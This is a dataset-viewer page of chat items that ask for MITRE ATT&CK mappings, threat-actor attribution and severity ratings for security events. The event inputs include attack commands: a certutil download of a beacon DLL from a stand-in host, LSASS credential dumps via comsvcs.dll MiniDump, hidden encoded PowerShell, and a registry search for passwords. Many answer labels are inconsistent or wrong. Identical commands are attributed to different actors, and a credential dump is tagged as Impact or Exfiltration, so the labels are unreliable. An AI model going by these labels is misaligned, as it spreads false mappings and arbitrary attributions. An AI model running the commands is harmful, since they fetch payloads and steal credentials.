messages listlengths 2 2 |
|---|
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.3.176.24",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA000... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.170.152.172",
"role": "user"
},
{
"content": "{\"tactics\": [\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", ... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3513 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.78.68.196",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0002\",... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1137 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.40.91.179",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\",... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"Hig... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.0.2.184",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ShimRatReporter gathered information automatically, without instruction from a C2, related to the user and host machine that is compiled into a report and sent to the operators.",
"role": "user"
},
{
"content": "{\"tactics\... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor executed commands and arguments for binaries that could be involved in data destruction activity, such as SDelete.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-4P25WTVXYT)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"severi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confidence\": \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-JZFO98456N)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Impact, Lateral Movement, Privilege Escalation",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-L8XGXIHAO6)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Collection",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: FIN8 has used emails with malicious links to lure victims into installing malware.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204\", \"T1204.001\"]}",
"role": "... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Some Volgmer variants use SSL to encrypt C2 communications.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: HAFNIUM has obtained IP addresses for publicly-accessible Exchange servers.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1590\", \"T1590.005\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-RO2D3VLVZN)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: environmental keying",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1480\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-PL3ZYMV800)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity\": \"E... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SILENTTRINITY has a keylogging capability.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.001\", \"T1056\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-W791CTYPFF)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Persistence, Execution",
"role": "user"
},
{
"content": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-4H4LU2OHZM)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": \"Critica... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confidence\": \... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Calisto uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0009\"], \"techniques\": [\"T1564\", ... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1129\"]}",
"role": "a... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2641 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"c... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.4.218.249",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: reg query HKCU /f password /t REG_SZ /s",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1552.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3272 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.10.233.208",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0040\"], \"technique... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CrackMapExec can collect DNS information from the targeted system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 532 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confide... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 769 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.139.146.252",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.101.199.115",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"],... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-6B14UN2AA1)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Persistence, Impact, Collection",
"role": "user"
},
{
"content":... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"conf... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-WG3W0FACRC)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Discovery, Reconnaissance",
"role": "user"
},
{
"content": "{\"se... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-Q8SZCQBQSM)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: One of Dtrack can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036.005\", \"T1036\"]}",
"role": "assistan... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3247 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.152.120.28",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Rover searches for files on attached removable drives based on a predefined list of file extensions every five seconds.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T10... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3557 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.177.40.231",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-I0WHFNDXRC)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Discovery",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-B01PQC9XAW)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Impact, Defense Evasion",
"role": "user"
},
... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Octopus has exfiltrated data to file sharing sites.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1567.002\", \"T1567\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-TYD2QCBC6N)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": "{\"severi... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.89.128.11",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0001\", \"TA0008\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3287 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.28.164.254",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0005\"],... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2837 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidenc... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Sandworm Team had gathered user, IP address, and server data related to RDP sessions on a compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1049\"]}",
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.13.54.155",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.127.21.222",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: RogueRobin uses regsvr32.exe to run a .sct file for execution.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.010\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3411 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.52.128.76",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\",... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3544 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.172.253.44",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0004\"],... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).",
"role": "user"
},
{
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Fox Kitten has used a Twitter account to communicate with ransomware victims.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1585\", \"T1585.001\"]}",
"role": "assistant"
... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ChangeServiceConfigW",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1489\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-9YGG1HUXU2)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Discovery, Initial Access, Exfiltration",
"role": "user"
},... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3111 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-18J5TMU6MJ)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution, Lateral Movement",
"role": "user"
},
{
"content": "{\"s... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious detinations ( destinations attributed to phishing campaigns).",
"r... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2868 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.72.39.209",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0009\"], \"techniques... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: TeamTNT has also encoded files using Base64.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-HS8Y9ASGYN)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Impact, Lateral Movement, Credential Access",
"role": "user"
},
{
"c... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 720 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.16.119.234",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3719 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"con... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for network data for uncommon data flows (, a client sending significantly more data than it receives from a server).",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T11... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1967 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence\"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 532 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.181.90.120",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA000... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Scattere... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: KeyBoy uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1559\", \"T1559.002\"]}",
"role": "a... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1507 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"con... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.103.58.140",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-8KNOZNRFV4)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Reconnaissance",
"role": "user"
},
{
"conten... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-NMP6973PIF)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Execution, Impact, Discovery",
"role": "user"
},
{
"content": "{\"severi... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: EvilGrab has the capability to capture video from a victim machine.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1125\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"c... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-28U0BBTUUS)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Discovery",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-SUT040NFF4)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Credential Access",
"role": "user"
},
{
"content": "... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-UFQE2XAGDL)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact, Reconnaissance",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.160.250.162",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techni... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, LOLBin, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confidenc... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: 05 27 28 obj32.bin obj32.bin obj64.bin Shellcode template is used by Reinstaller/Injector (rsXX.dll) and AudioRecorder4MetroApp (meXX.dll) for injecting into running processes",
"role": "user"
},
{
"content": "{\"tactics\":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-1AZU70SEO5)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.117.103.189",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may use the information from System Network Configuration Discovery during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3115 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.180.131.110",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1059.... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2855 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"con... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Mythic supports SSL encrypted C2.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.002\"]}",
"role": "assistant"
}
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.